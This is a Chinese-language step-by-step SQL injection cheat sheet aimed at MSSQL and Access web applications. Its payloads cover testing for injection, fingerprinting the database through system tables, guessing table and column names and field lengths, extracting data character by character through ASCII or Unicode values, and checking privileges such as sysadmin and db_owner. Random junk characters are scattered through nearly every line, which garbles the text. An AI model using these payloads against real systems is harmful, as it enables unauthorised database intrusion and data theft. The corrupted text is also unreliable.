1.判断是否有注入;and 1=1 ;and 1=2
6h
N~<
2.初步判断是否是mssql ;and user>0 d:0RDK-}s
n4%|F'ma
3.注入参数是字符'and [查询条件] and ''=' cL&V2I5O
/"?y @;Y~
4.搜索时没过滤参数的'and [查询条件] and '%25'=' p.q:vI$J
B&0^3iKFi
5.判断数据库系统 {
p {a0*$5
c,KT1me
;and (select count(*) from sysobjects)>0 mssql L0SeG:
lTPo2-j/eK
;and (select count(*) from msysobjects)>0 access PY:
l
@EzSosmF
<ns[(
Q
krZ J"`
6.猜数据库 ;and (select Count(*) from [数据库名])>0 m~~_iz_*
1TfK"\
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ]]$s"F<
fGJPZe
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ]{Vq;
{*H&NI
9.(1)猜字段的ascii值(access) I#Ay)+D
l?~SH[V
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 o)'T#uK
xA]CtB*o7
(2)猜字段的ascii值(mssql) (7x5
I,vy__sZ
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 <3z]d?u
nnIBN4
10.测试权限结构(mssql) s
S8Z5k;
Nh~ Hh(
8qn1?Lb
H
r? G_L
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- O^hWG ~o
[o<R#f`
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- X>2_Gol!
aM?Xi6
U5
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- VYkOJAEBg
j[gX"PdQ
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ,Cj1S7GFR
_)Q)tOW
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 314PcSc
0/S|P1!b
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- }N(-e$88
V0z.w:-
;and 1=(select IS_MEMBER('db_owner'));-- oEU %"
EP&